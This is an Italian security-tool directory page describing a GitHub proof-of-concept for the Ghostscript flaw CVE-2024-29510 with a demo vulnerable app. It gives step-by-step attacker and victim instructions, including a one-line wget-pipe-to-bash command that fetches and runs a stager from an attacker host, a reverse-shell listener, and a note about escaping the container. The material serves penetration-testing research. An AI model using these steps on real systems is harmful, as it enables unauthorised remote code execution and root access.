Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-29510 — Codice POC per CVE-2024-29510 e demo VulnApp | Kitploit
Strumenti/GitHubGitHub/swsmith2391/cve-2024-29510
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSviluppo PayloadEscape dal ContainerBinary Exploitation
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

Codice POC per CVE-2024-29510 e demo VulnApp

Vedi Repository
112 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Original research and POC code: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

NOTA: non ho apportato modifiche al POC a parte il comando eseguito. Tutto il merito va a Thomas Rinsma @ Codean Labs per la loro fantastica ricerca e POC.

Scenario Locale

  1. Incluso in uno script stager per scaricare ed eseguire lo script di controllo e verificare se l'host è vulnerabile
  2. POC modificato per scaricare ed eseguire una reverse shell Python3
  3. Stager e reverse shell scaricati ed eseguiti tramite STDIN
  4. Il POC lascia un artefatto in /tmp con nome casuale

Sull'host attaccante:

  1. Usando pwncat-cs o netcat, crea un listener per la porta 443
  2. Vai nella directory dell'exploit
  3. python3 -m http.server 80

Sull'host vittima (Ubuntu 23.10 con Ghostscript 10.01.2):

  1. Apri il terminale ed esegui: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

Scenario Remoto (VulnApp)

  1. Compila VulnApp usando: 'docker build -t cve-2024-29510-demo:latest .' (Richiede una copia di https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz nella directory del Dockerfile)
  2. Esegui VulnApp usando: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. Prova a convertire good.ps per testare il funzionamento. Dovrebbe restituire un PDF renderizzato con linee che disegnano una freccia, ad esempio '>'
  4. Configura un server web sulla porta 80 che ospiti shell.html, ad esempio 'python3 -m http.server 80'
  5. Usando pwncat-cs o netcat, crea un listener per la porta 443
  6. Carica bad.eps, VulnApp si bloccherà e il listener dovrebbe catturare una reverse shell per il container (in esecuzione come root)
  7. Esci dal container!
Scarica lo strumento